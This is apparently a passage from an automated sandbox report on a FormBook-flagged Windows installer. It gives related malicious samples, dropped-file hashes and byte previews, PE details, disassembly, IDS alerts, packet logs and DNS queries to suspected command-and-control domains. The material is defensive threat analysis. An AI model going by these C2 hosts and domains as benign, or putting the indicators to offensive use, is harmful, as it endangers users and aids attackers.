                                          s9SWgUgyO5.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          Docusign_Signature_1019003.htmlGet hashmaliciousBrowse
                                          • 104.16.19.94
                                          GU#U00cdA DE CARGA...exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          TT09876545678T8R456.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          Original Shipping documents.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          Image-Scan-80195056703950029289.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          RHgAncmh0E.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          01_extracted.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          InvPixcareer.-5589234_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          INQUIRY LIST.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          qJvDfzBXbsGet hashmaliciousBrowse
                                          • 104.16.180.49
                                          YTHK21082400.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          CLOUDFLARENETUSD.I. Pipes Fittings.docGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          2mdb3OG6FM.exeGet hashmaliciousBrowse
                                          • 104.23.98.190
                                          DHL AWB# 4AB19037XXX.pdf.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          fTset285bI.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          aQKifdER74.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          s9SWgUgyO5.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          Docusign_Signature_1019003.htmlGet hashmaliciousBrowse
                                          • 104.16.19.94
                                          GU#U00cdA DE CARGA...exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          TT09876545678T8R456.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          Original Shipping documents.exeGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          Image-Scan-80195056703950029289.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          RHgAncmh0E.exeGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.129.233
                                          InvPixcareer.-43329_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.130.233
                                          01_extracted.exeGet hashmaliciousBrowse
                                          • 104.21.19.200
                                          InvPixcareer.-5589234_20210927.xlsbGet hashmaliciousBrowse
                                          • 162.159.135.233
                                          INQUIRY LIST.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          qJvDfzBXbsGet hashmaliciousBrowse
                                          • 104.16.180.49
                                          YTHK21082400.exeGet hashmaliciousBrowse
                                          • 162.159.133.233
                                          Silver_Light_Group_DOC03027321122.exeGet hashmaliciousBrowse
                                          • 162.159.129.233

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\Local\Temp\heydlav1me3m3
                                          Process:C:\Users\user\Desktop\DN_467842234567.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):216352
                                          Entropy (8bit):7.988889824927144
                                          Encrypted:false
                                          SSDEEP:6144:B3LvyTtzd7TaYoyfuV6l1QOqvZV37EmPUxe:B3LKTtz5oyi2KZFXKe
                                          MD5:58C2415280597F09508AF99848706970
                                          SHA1:519D3C89A189C57CCF79D068668CCBF0D945D4AA
                                          SHA-256:1C1E3D64943CD74398E9AE298D957AF7C941FCD7161306D24FFD88A9F03A73F7
                                          SHA-512:A016852CB37C15558A4E1414E765B62719639CC466F22D697E8FBA339EAE58EC3C939C4AB3EBB00875B54CFB19A079074B67346C01968C6DBED949714FCB3E10
                                          Malicious:false
                                          Reputation:low
                                          Preview: Z+Y*5i.>.UDh....5.&......L...!e..%...Ub....W.eT..%h..fk..N....!..o..a;.}Q...G..b0.lz.I....@Z..$.....|V..>9.O.L......*..;.`.....#..0.R.gA."CS....d..P-Vm8.*.E..|......ll.ew.u.Keu.6..fo........%u.S.{e.8m.I..........F:3..MtJ..T.0...0C.04..w1.X.^..w..p.Yz'AFZi.>...<.t.YYh...l4.Zg.'..!e.w.%..Ub..t.W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]....h..6.....t?... ..%.S.{e.}m...5..k....F:3..M}.....0...0C.4.5w1.k.^s._..p.Y.'zFZi.>.w.<..YYh...l..Zg.'.i.!e..%...Ub....W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]..u.Keu.6...o.t...3f.%u.S.{e.}m...5...k....F:3..M}.....0...0C.4.5w1.k.^s._..p.Y.'zFZi.>.w.<..YYh...l..Zg.'.i.!e..%...Ub....W.eT..%h..fk......4\.eojS"\q....4.Ie....V....fM.M.N]....Y.M.e..U%g..[..V..;.`..I.JY)...[Ni9......m.)o.!..k7)Z.S.#...e:U|..E,]..u.Keu.6...o.t...3f.%u.S.{e.}m...5...k....F:3..M}.....0
                                          C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll
                                          Process:C:\Users\user\Desktop\DN_467842234567.exe
                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):16384
                                          Entropy (8bit):6.5327019634702514
                                          Encrypted:false
                                          SSDEEP:192:4ouT5wvAi3OL1PJuIJHSArHv6vQmgbehh8dgq47bmDQH4UJ58cHk2:4ouT7ZSav6KYmDncE2
                                          MD5:6B93D55CD940BABD5EAB05E0A8A2FEA7
                                          SHA1:E2FC9047947BDD96F92B8E1D103FC13FB606D540
                                          SHA-256:3EEFD1C7DAF2B08BC38159F216CD5E79CA1BDAF923EE6993EDDBC602E6B84E15
                                          SHA-512:070016B91BE674AD938CC407D045D1D175ACBEE61161EC63A994D84E74E72663AA6B1BC3E57843F6BEF5C13C26E066E245CCDDDC41FA198435DED18CAA3A2DD8
                                          Malicious:true
                                          Antivirus:
                                          • Antivirus: Joe Sandbox ML, Detection: 100%
                                          • Antivirus: ReversingLabs, Detection: 11%
                                          Reputation:low
                                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......y.Q4=.?g=.?g=.?g.3.g<.?gN.9f9.?gN.>f,.?g=.>g..?g..;f<.?g..?f<.?g...g<.?g..=f<.?gRich=.?g........PE..L...m Qa...........!.........$...............0............................................@..........................B..H....D.......p..........................d....B...............................................@...............................text...*........................... ..`.bss.........0...........................rdata.......@......................@..@.data........P.......&..............@....rsrc........p.......<..............@..@.reloc..d............>..............@..B................................................................................................................................................................................................................................................................................................

                                          Static File Info

                                          General

                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.907089954961491
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:DN_467842234567.exe
                                          File size:259211
                                          MD5:c16013ea29f9dd1525dcb65c2184784e
                                          SHA1:5afd533f29573050734e428f9f8c9ba08c79546a
                                          SHA256:df05d916a02c09e1dba0df0841f93697e407a334ce8d2371dfe8befd909d8a43
                                          SHA512:87c9e01aac687d2c675cb281592c930ce7bfefebc4eecde4135834bf896265d0238f9afc98726214fc30ef19c2528740aadf12df00e7cb44c469e56d5e9eefca
                                          SSDEEP:6144:F8LxBsFqxTsbu0sRCwePkl1QOOMKgUx6N:/slG1465p+
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........0(..QF..QF..QF.*^...QF..QG.qQF.*^...QF..rv..QF..W@..QF.Rich.QF.........PE..L...m:.V.................`..........*1.......p....@

                                          File Icon

                                          Icon Hash:b2a88c96b2ca6a72

                                          Static PE Info

                                          General

                                          Entrypoint:0x40312a
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                          DLL Characteristics:TERMINAL_SERVER_AWARE
                                          Time Stamp:0x56FF3A6D [Sat Apr 2 03:20:13 2016 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:b76363e9cb88bf9390860da8e50999d2

                                          Entrypoint Preview

                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push ebp
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+20h], ebx
                                          mov dword ptr [esp+14h], 00409168h
                                          mov dword ptr [esp+1Ch], ebx
                                          mov byte ptr [esp+18h], 00000020h
                                          call dword ptr [004070B0h]
                                          call dword ptr [004070ACh]
                                          cmp ax, 00000006h
                                          je 00007F467CB36D43h
                                          push ebx
                                          call 00007F467CB39B24h
                                          cmp eax, ebx
                                          je 00007F467CB36D39h
                                          push 00000C00h
                                          call eax
                                          mov esi, 00407280h
                                          push esi
                                          call 00007F467CB39AA0h
                                          push esi
                                          call dword ptr [00407108h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007F467CB36D1Dh
                                          push 0000000Dh
                                          call 00007F467CB39AF8h
                                          push 0000000Bh
                                          call 00007F467CB39AF1h
                                          mov dword ptr [0042EC24h], eax
                                          call dword ptr [00407038h]
                                          push ebx
                                          call dword ptr [0040726Ch]
                                          mov dword ptr [0042ECD8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 00429058h
                                          call dword ptr [0040715Ch]
                                          push 0040915Ch
                                          push 0042E420h
                                          call 00007F467CB39724h
                                          call dword ptr [0040710Ch]
                                          mov ebp, 00434000h
                                          push eax
                                          push ebp
                                          call 00007F467CB39712h
                                          push ebx
                                          call dword ptr [00407144h]

                                          Rich Headers

                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x75240xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x9e0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x27c.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5e660x6000False0.670572916667data6.44065573436IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x12a20x1400False0.4455078125data5.0583287871IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x25d180x600False0.458984375data4.18773476617IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                          .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .rsrc0x370000x9e00xa00False0.45390625data4.4968702957IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                          Resources

                                          NameRVASizeTypeLanguageCountry
                                          RT_ICON0x371900x2e8dataEnglishUnited States
                                          RT_DIALOG0x374780x100dataEnglishUnited States
                                          RT_DIALOG0x375780x11cdataEnglishUnited States
                                          RT_DIALOG0x376980x60dataEnglishUnited States
                                          RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                                          RT_MANIFEST0x377100x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                          Imports

                                          DLLImport
                                          KERNEL32.dllGetTickCount, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, SetFileAttributesA, CompareFileTime, SearchPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, GetTempPathA, Sleep, lstrcmpiA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrcatA, GetSystemDirectoryA, WaitForSingleObject, SetFileTime, CloseHandle, GlobalFree, lstrcmpA, ExpandEnvironmentStringsA, GetExitCodeProcess, GlobalAlloc, lstrlenA, GetCommandLineA, GetProcAddress, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, ReadFile, FindClose, GetPrivateProfileStringA, WritePrivateProfileStringA, WriteFile, MulDiv, MultiByteToWideChar, LoadLibraryExA, GetModuleHandleA, FreeLibrary
                                          USER32.dllSetCursor, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, EndDialog, ScreenToClient, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetForegroundWindow, GetWindowLongA, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, SetTimer, PostQuitMessage, SetWindowLongA, SendMessageTimeoutA, LoadImageA, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, SetClipboardData, EmptyClipboard, OpenClipboard, EndPaint, CreateDialogParamA, DestroyWindow, ShowWindow, SetWindowTextA
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA, ShellExecuteA
                                          ADVAPI32.dllRegDeleteValueA, SetFileSecurityA, RegOpenKeyExA, RegDeleteKeyA, RegEnumValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

                                          Possible Origin

                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States

                                          Network Behavior

                                          Snort IDS Alerts

                                          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                          09/27/21-21:06:35.892571TCP1201ATTACK-RESPONSES 403 Forbidden804982934.102.136.180192.168.2.4
                                          09/27/21-21:06:40.999753TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.45.9.90.226
                                          09/27/21-21:06:40.999753TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.45.9.90.226
                                          09/27/21-21:06:40.999753TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983980192.168.2.45.9.90.226
                                          09/27/21-21:07:01.684685TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.435.246.6.109
                                          09/27/21-21:07:01.684685TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.435.246.6.109
                                          09/27/21-21:07:01.684685TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984980192.168.2.435.246.6.109
                                          09/27/21-21:07:17.348883UDP254DNS SPOOF query response with TTL of 1 min. and no authority53624208.8.8.8192.168.2.4

                                          Network Port Distribution

                                          TCP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 21:06:30.553550959 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:30.573894024 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.574076891 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:30.575259924 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:30.595679045 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.639205933 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.639230967 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.639241934 CEST8049828104.21.11.163192.168.2.4
                                          Sep 27, 2021 21:06:30.639520884 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:30.639628887 CEST4982880192.168.2.4104.21.11.163
                                          Sep 27, 2021 21:06:35.700731993 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.713982105 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:35.714169025 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.714364052 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.726947069 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:35.892570972 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:35.892592907 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:35.892792940 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.892947912 CEST4982980192.168.2.434.102.136.180
                                          Sep 27, 2021 21:06:35.905397892 CEST804982934.102.136.180192.168.2.4
                                          Sep 27, 2021 21:06:40.974280119 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:40.999039888 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:06:40.999228001 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:40.999752998 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:41.026427031 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:06:41.026473045 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:06:41.026489019 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:06:41.026765108 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:41.026814938 CEST4983980192.168.2.45.9.90.226
                                          Sep 27, 2021 21:06:41.055721998 CEST80498395.9.90.226192.168.2.4
                                          Sep 27, 2021 21:07:01.652254105 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.684393883 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:01.684525967 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.684684992 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.716600895 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:01.767618895 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:01.767653942 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:01.767867088 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.774135113 CEST4984980192.168.2.435.246.6.109
                                          Sep 27, 2021 21:07:01.806262970 CEST804984935.246.6.109192.168.2.4
                                          Sep 27, 2021 21:07:11.864828110 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:11.884675026 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:11.884784937 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:11.884968996 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:11.906678915 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270593882 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270634890 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270663023 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270725012 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270749092 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270771027 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270791054 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270921946 CEST8049862172.67.148.98192.168.2.4
                                          Sep 27, 2021 21:07:12.270957947 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:12.271037102 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:12.271249056 CEST4986280192.168.2.4172.67.148.98
                                          Sep 27, 2021 21:07:17.350616932 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:17.621839046 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:17.621975899 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:17.622366905 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:17.893615961 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:18.128928900 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:18.216249943 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:18.216413975 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:18.216514111 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:18.216593981 CEST4986380192.168.2.4202.165.66.108
                                          Sep 27, 2021 21:07:18.400197983 CEST8049863202.165.66.108192.168.2.4
                                          Sep 27, 2021 21:07:18.400415897 CEST4986380192.168.2.4202.165.66.108

                                          UDP Packets

                                          TimestampSource PortDest PortSource IPDest IP
                                          Sep 27, 2021 21:05:12.751811981 CEST5309753192.168.2.48.8.8.8
                                          Sep 27, 2021 21:05:12.765037060 CEST53530978.8.8.8192.168.2.4
                                          Sep 27, 2021 21:05:12.815171957 CEST4925753192.168.2.48.8.8.8
                                          Sep 27, 2021 21:05:12.849423885 CEST53492578.8.8.8192.168.2.4
                                          Sep 27, 2021 21:05:15.308841944 CEST6238953192.168.2.48.8.8.8
                                          Sep 27, 2021 21:05:15.328419924 CEST53623898.8.8.8192.168.2.4
                                          Sep 27, 2021 21:05:47.821726084 CEST4991053192.168.2.48.8.8.8
                                          Sep 27, 2021 21:05:47.856849909 CEST53499108.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:04.935619116 CEST5585453192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:04.949014902 CEST53558548.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:19.382409096 CEST6454953192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:19.466084003 CEST53645498.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:20.491133928 CEST6315353192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:20.590030909 CEST53631538.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:21.112752914 CEST5299153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:21.126204014 CEST53529918.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:21.517863989 CEST5370053192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:21.532602072 CEST53537008.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:21.997997999 CEST5172653192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:22.071230888 CEST53517268.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:22.568157911 CEST5679453192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:22.602807999 CEST53567948.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:22.627233982 CEST5653453192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:22.640460014 CEST53565348.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:23.116815090 CEST5662753192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:23.130039930 CEST53566278.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:23.803390026 CEST5662153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:23.819374084 CEST53566218.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:24.670516014 CEST6311653192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:24.684900999 CEST53631168.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:25.197482109 CEST6407853192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:25.270685911 CEST53640788.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:25.463162899 CEST6480153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:25.505198002 CEST53648018.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:26.416028976 CEST6172153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:26.434570074 CEST53617218.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:30.520242929 CEST5125553192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:30.547971010 CEST53512558.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:35.663887978 CEST6152253192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:35.699017048 CEST53615228.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:40.929733038 CEST5233753192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:40.970762968 CEST53523378.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:46.039324045 CEST5504653192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:46.097685099 CEST53550468.8.8.8192.168.2.4
                                          Sep 27, 2021 21:06:51.119846106 CEST4961253192.168.2.48.8.8.8
                                          Sep 27, 2021 21:06:51.155942917 CEST53496128.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:01.369004965 CEST4928553192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:01.650717974 CEST53492858.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:06.746467113 CEST5060153192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:06.774045944 CEST53506018.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:06.792208910 CEST6087553192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:06.828392029 CEST53608758.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:08.524833918 CEST5644853192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:08.539501905 CEST53564488.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:11.835009098 CEST5917253192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:11.863893032 CEST53591728.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:17.312665939 CEST6242053192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:17.348882914 CEST53624208.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:23.146285057 CEST6057953192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:23.229141951 CEST53605798.8.8.8192.168.2.4
                                          Sep 27, 2021 21:07:28.240982056 CEST5018353192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:29.255203009 CEST5018353192.168.2.48.8.8.8
                                          Sep 27, 2021 21:07:29.344136953 CEST53501838.8.8.8192.168.2.4

                                          DNS Queries

                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                          Sep 27, 2021 21:06:25.463162899 CEST192.168.2.48.8.8.80xaa6bStandard query (0)www.kxdrstone.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:30.520242929 CEST192.168.2.48.8.8.80xd5e4Standard query (0)www.nurhalilah.xyzA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:35.663887978 CEST192.168.2.48.8.8.80xccddStandard query (0)www.uscryptomininglaws.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:40.929733038 CEST192.168.2.48.8.8.80x924eStandard query (0)www.financecreditpro.comA (IP address)IN (0x0001)
                                          Sep 27, 2021 21:06:46.039324045 CEST192.168.2.48.8.8.80xc1cbStandard query (0)www.smpldebts.comA (IP address)IN (0x0001)
